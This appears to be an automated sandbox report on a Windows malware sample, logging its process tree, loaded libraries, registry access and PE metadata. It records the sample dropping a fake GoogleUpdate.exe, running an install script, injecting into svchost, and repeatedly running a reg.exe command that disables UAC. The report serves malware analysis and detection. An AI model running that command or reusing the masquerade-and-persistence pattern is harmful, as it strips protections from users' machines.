Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Command line argument: exepath	10_2_0040D3F0
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Command line argument: 0gj	10_2_0040D3F0
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Command line argument: licence	10_2_0040D3F0
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Command line argument: `"G	10_2_0040D3F0
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Command line argument: Administrator	10_2_0040D3F0
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Command line argument: User	10_2_0040D3F0
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Command line argument: Software\	18_2_0040D3F0
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Command line argument: 0"G	18_2_0040D3F0
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Command line argument: Exe	18_2_0040D3F0
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Command line argument: 0"G	18_2_0040D3F0
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Command line argument: (#G	18_2_0040D3F0
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Command line argument: Inj	18_2_0040D3F0
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Command line argument: Inj	18_2_0040D3F0
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Command line argument: Inj	18_2_0040D3F0
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Command line argument: 0"G	18_2_0040D3F0
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Command line argument: origmsc	18_2_0040D3F0
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Command line argument: !G	18_2_0040D3F0
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Command line argument: !G	18_2_0040D3F0
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Command line argument: !G	18_2_0040D3F0
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Command line argument: H"G	18_2_0040D3F0
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Command line argument: !G	18_2_0040D3F0
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Command line argument: exepath	18_2_0040D3F0
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Command line argument: H"G	18_2_0040D3F0
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Command line argument: exepath	18_2_0040D3F0
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Command line argument: !G	18_2_0040D3F0
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Command line argument: licence	18_2_0040D3F0
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Command line argument: `"G	18_2_0040D3F0
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Command line argument: Administrator	18_2_0040D3F0
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Command line argument: User	18_2_0040D3F0

Source: DB5rQYsfd6.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\DB5rQYsfd6.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\DB5rQYsfd6.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: DB5rQYsfd6.exe	ReversingLabs: Detection: 89%
Source: DB5rQYsfd6.exe	Virustotal: Detection: 84%

Source: C:\Users\user\Desktop\DB5rQYsfd6.exe

File read: C:\Users\user\Desktop\DB5rQYsfd6.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\DB5rQYsfd6.exe "C:\Users\user\Desktop\DB5rQYsfd6.exe"
Source: C:\Users\user\Desktop\DB5rQYsfd6.exe	Process created: C:\Windows\SysWOW64\cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
Source: C:\Users\user\Desktop\DB5rQYsfd6.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\install.vbs"
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c "C:\ProgramData\GoogleDat\GoogleUpdate.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\ProgramData\GoogleDat\GoogleUpdate.exe C:\ProgramData\GoogleDat\GoogleUpdate.exe
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Process created: C:\Windows\SysWOW64\cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Process created: C:\Windows\SysWOW64\svchost.exe svchost.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
Source: unknown	Process created: C:\ProgramData\GoogleDat\GoogleUpdate.exe "C:\ProgramData\GoogleDat\GoogleUpdate.exe"
Source: unknown	Process created: C:\ProgramData\GoogleDat\GoogleUpdate.exe "C:\ProgramData\GoogleDat\GoogleUpdate.exe"
Source: unknown	Process created: C:\ProgramData\GoogleDat\GoogleUpdate.exe "C:\ProgramData\GoogleDat\GoogleUpdate.exe"
Source: unknown	Process created: C:\ProgramData\GoogleDat\GoogleUpdate.exe "C:\ProgramData\GoogleDat\GoogleUpdate.exe"
Source: unknown	Process created: C:\ProgramData\GoogleDat\GoogleUpdate.exe "C:\ProgramData\GoogleDat\GoogleUpdate.exe"
Source: unknown	Process created: C:\ProgramData\GoogleDat\GoogleUpdate.exe "C:\ProgramData\GoogleDat\GoogleUpdate.exe"
Source: C:\Users\user\Desktop\DB5rQYsfd6.exe	Process created: C:\Windows\SysWOW64\cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f	Jump to behavior
Source: C:\Users\user\Desktop\DB5rQYsfd6.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\install.vbs"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c "C:\ProgramData\GoogleDat\GoogleUpdate.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\ProgramData\GoogleDat\GoogleUpdate.exe C:\ProgramData\GoogleDat\GoogleUpdate.exe	Jump to behavior
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Process created: C:\Windows\SysWOW64\cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f	Jump to behavior
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Process created: C:\Windows\SysWOW64\svchost.exe svchost.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

Source: C:\Users\user\Desktop\DB5rQYsfd6.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\DB5rQYsfd6.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\DB5rQYsfd6.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\DB5rQYsfd6.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\DB5rQYsfd6.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\DB5rQYsfd6.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\DB5rQYsfd6.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\DB5rQYsfd6.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\DB5rQYsfd6.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\DB5rQYsfd6.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\DB5rQYsfd6.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\DB5rQYsfd6.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\DB5rQYsfd6.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\DB5rQYsfd6.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\DB5rQYsfd6.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\DB5rQYsfd6.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\DB5rQYsfd6.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Users\user\Desktop\DB5rQYsfd6.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Users\user\Desktop\DB5rQYsfd6.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\DB5rQYsfd6.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\DB5rQYsfd6.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\DB5rQYsfd6.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\DB5rQYsfd6.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\DB5rQYsfd6.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\DB5rQYsfd6.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\DB5rQYsfd6.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\DB5rQYsfd6.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Section loaded: acgenral.dll	Jump to behavior
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Section loaded: msacm32.dll	Jump to behavior
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Section loaded: version.dll	Jump to behavior
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Section loaded: winmmbase.dll	Jump to behavior
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Section loaded: winmmbase.dll	Jump to behavior
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: acgenral.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: winmm.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: samcli.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: msacm32.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: dwmapi.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: winmmbase.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: winmmbase.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: aclayers.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: sfc.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: sfc_os.dll
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\reg.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Section loaded: acgenral.dll	Jump to behavior
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Section loaded: msacm32.dll	Jump to behavior
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Section loaded: version.dll	Jump to behavior
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Section loaded: winmmbase.dll	Jump to behavior
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Section loaded: winmmbase.dll	Jump to behavior
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Section loaded: acgenral.dll	Jump to behavior
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Section loaded: msacm32.dll	Jump to behavior
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Section loaded: version.dll	Jump to behavior
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Section loaded: winmmbase.dll	Jump to behavior
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Section loaded: winmmbase.dll	Jump to behavior
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Section loaded: acgenral.dll	Jump to behavior
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Section loaded: msacm32.dll	Jump to behavior
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Section loaded: version.dll	Jump to behavior
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Section loaded: winmmbase.dll	Jump to behavior
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Section loaded: winmmbase.dll	Jump to behavior
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Section loaded: kernel.appcore.dll	Jump to behavior

Source: C:\Users\user\Desktop\DB5rQYsfd6.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32

Jump to behavior

Source: DB5rQYsfd6.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: DB5rQYsfd6.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: DB5rQYsfd6.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: DB5rQYsfd6.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: DB5rQYsfd6.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: DB5rQYsfd6.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: DB5rQYsfd6.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source: DB5rQYsfd6.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: DB5rQYsfd6.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: DB5rQYsfd6.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: DB5rQYsfd6.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: DB5rQYsfd6.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Users\user\Desktop\DB5rQYsfd6.exe

Code function: 0_2_0041A8DA LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,

0_2_0041A8DA

Source: C:\Users\user\Desktop\DB5rQYsfd6.exe	Code function: 0_2_004542E6 push ecx; ret	0_2_004542F9
Source: C:\Users\user\Desktop\DB5rQYsfd6.exe	Code function: 0_2_00432BD6 push ecx; ret	0_2_00432BE9
Source: C:\Users\user\Desktop\DB5rQYsfd6.exe	Code function: 0_2_00454C08 push eax; ret	0_2_00454C26
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Code function: 10_2_004542E6 push ecx; ret	10_2_004542F9
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Code function: 10_2_00432BD6 push ecx; ret	10_2_00432BE9
